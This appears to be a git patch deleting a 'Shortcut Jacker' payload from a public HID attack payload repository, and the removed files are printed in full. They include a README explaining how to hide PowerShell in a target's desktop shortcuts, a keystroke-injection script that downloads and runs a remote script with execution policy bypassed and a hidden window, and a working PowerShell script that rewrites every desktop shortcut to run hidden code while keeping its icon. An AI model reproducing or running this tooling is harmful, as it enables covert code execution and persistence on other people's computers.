From 0e6f441e20f4258468b2b7bf1653feaf5bf8c760 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Tue, 25 Jul 2023 16:27:42 -0500 Subject: [PATCH] Delete Payloads/Flip-ShortcutJacker directory --- Payloads/Flip-ShortcutJacker/README.md | 150 ------------------ .../Shortcut-Jacker-Execute.txt | 10 -- .../Flip-ShortcutJacker/Shortcut-Jacker.ps1 | 118 -------------- 3 files changed, 278 deletions(-) delete mode 100644 Payloads/Flip-ShortcutJacker/README.md delete mode 100644 Payloads/Flip-ShortcutJacker/Shortcut-Jacker-Execute.txt delete mode 100644 Payloads/Flip-ShortcutJacker/Shortcut-Jacker.ps1 diff --git a/Payloads/Flip-ShortcutJacker/README.md b/Payloads/Flip-ShortcutJacker/README.md deleted file mode 100644 index 47e50af..0000000 --- a/Payloads/Flip-ShortcutJacker/README.md +++ /dev/null @@ -1,150 +0,0 @@ -![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) - - - -

- - - -

- - -
- Table of Contents -
    -
  1. Description
    2. -
  2. Getting Started
    3. -
  3. Contributing
    4. -
  4. Version History
    5. -
  5. Contact
    6. -
  6. Acknowledgments
    7. -
-
- -# Shortcut Jacker - -

- - Python - -
YouTube Tutorial -

- -A script used to embed malware in the shortcut on your target's desktop. - -## Description - -This payload will run a PowerShell script in the background of any shortcut used on the target's desktop. - -This is done by taking advantage of the `Target` field where PowerShell commands can be stored or run. - -This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the `$code` variable and it will still run. - -So if your command exceeds that, consider using an IWR function to download and execute a longer script. - -I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13) - - - -Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the PowerShell code you want executed is stored. - ---------------------------------------------------------------------------------------------------------------------------------------------------------- - - - ---------------------------------------------------------------------------------------------------------------------------------------------------------- - -Using the `Get-Shortcut` function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the `Target` field. - - - -## Getting Started - -Once the script is executed, all of the shortcuts on your target's desktop will be infected with the PowerShell code you have stored in the `$code` variable in the .ps1 file - -### Dependencies - -* An internet connection -* Windows 10,11 - -

(back to top)

- -### Executing program - -* Plug in your device -* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload -``` -powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl -``` - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -I am Jakoby - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -

(back to top)

- - -## Contact - -

πŸ“± My Socials πŸ“±

-
- - - - - - - - -
- - C# - -
YouTube - 		- - Python - -
Twitter - 		- - Golang - -
Instagram - 		- - Jsonnet - -
Discord - 		- - Jsonnet - -
TikTok -
-
- -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [MG](https://github.com/OMG-MG) - -

(back to top)

- -

- Github Stats -

diff --git a/Payloads/Flip-ShortcutJacker/Shortcut-Jacker-Execute.txt b/Payloads/Flip-ShortcutJacker/Shortcut-Jacker-Execute.txt deleted file mode 100644 index 45a9edb..0000000 --- a/Payloads/Flip-ShortcutJacker/Shortcut-Jacker-Execute.txt +++ /dev/null @@ -1,10 +0,0 @@ -REM Title: Shortcut-Jacker -REM Author: I am Jakoby -REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop -REM Target: Windows 10, 11 -GUI r -DELAY 500 -STRING powershell -w h -NoP -NonI -Ep Bypass iwr LINK | iex -ENTER -REM Remember to replace the link with your DropBox shared link for the intended file to download -REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly diff --git a/Payloads/Flip-ShortcutJacker/Shortcut-Jacker.ps1 b/Payloads/Flip-ShortcutJacker/Shortcut-Jacker.ps1 deleted file mode 100644 index 83603c4..0000000 --- a/Payloads/Flip-ShortcutJacker/Shortcut-Jacker.ps1 +++ /dev/null @@ -1,118 +0,0 @@ -############################################################################################################################################################ -# | ___ _ _ _ # ,d88b.d88b # -# Title : Shortcut-Jacker | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # -# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # -# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # -# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # -# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # -# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # -# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # -# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # -# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # -#__________________________________|_________________________________________________________________________# | | ) ~ ( # -# tiktok.com/@i_am_jakoby # / \ / ~ \ # -# github.com/I-Am-Jakoby # \ / \~ ~/ # -# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# -# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# -# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# -############################################################################################################################################################ - -<# -.SYNOPSIS - This is payload used to inject PowerShell code into shortcuts. - -.DESCRIPTION - This payload will gather information on the shortcuts on your targets desktop. - That data will then be manipulated to embed a PowerShell script. - This script will be ran in the background when the short cut is. - -#> - -############################################################################################################################################################ - -<# -.NOTES - The PowerShell code stored in this variable is what will run in the background. - This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code - variable and it will still run. -#> - -$code = "Add-Type -AssemblyName PresentationCore,PresentationFramework; [System.Windows.MessageBox]::Show('Hacked')" - -############################################################################################################################################################ - -function Get-Shortcut { - param( - $path = $null - ) - - $obj = New-Object -ComObject WScript.Shell - - if ($path -eq $null) { - $pathUser = [System.Environment]::GetFolderPath('StartMenu') - $pathCommon = $obj.SpecialFolders.Item('AllUsersStartMenu') - $path = dir $pathUser, $pathCommon -Filter *.lnk -Recurse - } - if ($path -is [string]) { - $path = dir $path -Filter *.lnk - } - $path | ForEach-Object { - if ($_ -is [string]) { - $_ = dir $_ -Filter *.lnk - } - if ($_) { - $link = $obj.CreateShortcut($_.FullName) - - $info = @{} - $info.Hotkey = $link.Hotkey - $info.TargetPath = $link.TargetPath - $info.LinkPath = $link.FullName - $info.Arguments = $link.Arguments - $info.Target = try {Split-Path $info.TargetPath -Leaf } catch { 'n/a'} - $info.Link = try { Split-Path $info.LinkPath -Leaf } catch { 'n/a'} - $info.WindowStyle = $link.WindowStyle - $info.IconLocation = $link.IconLocation - - return $info - } - } -} - -#----------------------------------------------------------------------------------------------------------- - -function Set-Shortcut { - param( - [Parameter(ValueFromPipelineByPropertyName=$true)] - $LinkPath, - $IconLocation, - $Arguments, - $TargetPath - ) - begin { - $shell = New-Object -ComObject WScript.Shell - } - - process { - $link = $shell.CreateShortcut($LinkPath) - - $PSCmdlet.MyInvocation.BoundParameters.GetEnumerator() | - Where-Object { $_.key -ne 'LinkPath' } | - ForEach-Object { $link.$($_.key) = $_.value } - $link.Save() - } -} - -#----------------------------------------------------------------------------------------------------------- - -function hijack{ -$Link = $i.LinkPath -$Loc = $i.IconLocation -$TargetPath = $i.TargetPath -if($Loc.length -lt 4){$Loc = "$TargetPath$Loc"} -$Target = $i.Target -if(Test-Path -Path "$Link" -PathType Leaf){Set-Shortcut -LinkPath "$Link" -IconLocation "$Loc" -Arguments "-w h -NoP -NonI -Exec Bypass start-process '$TargetPath';$code" -TargetPath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"} -} - -#----------------------------------------------------------------------------------------------------------- - -Get-ChildItem –Path "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName}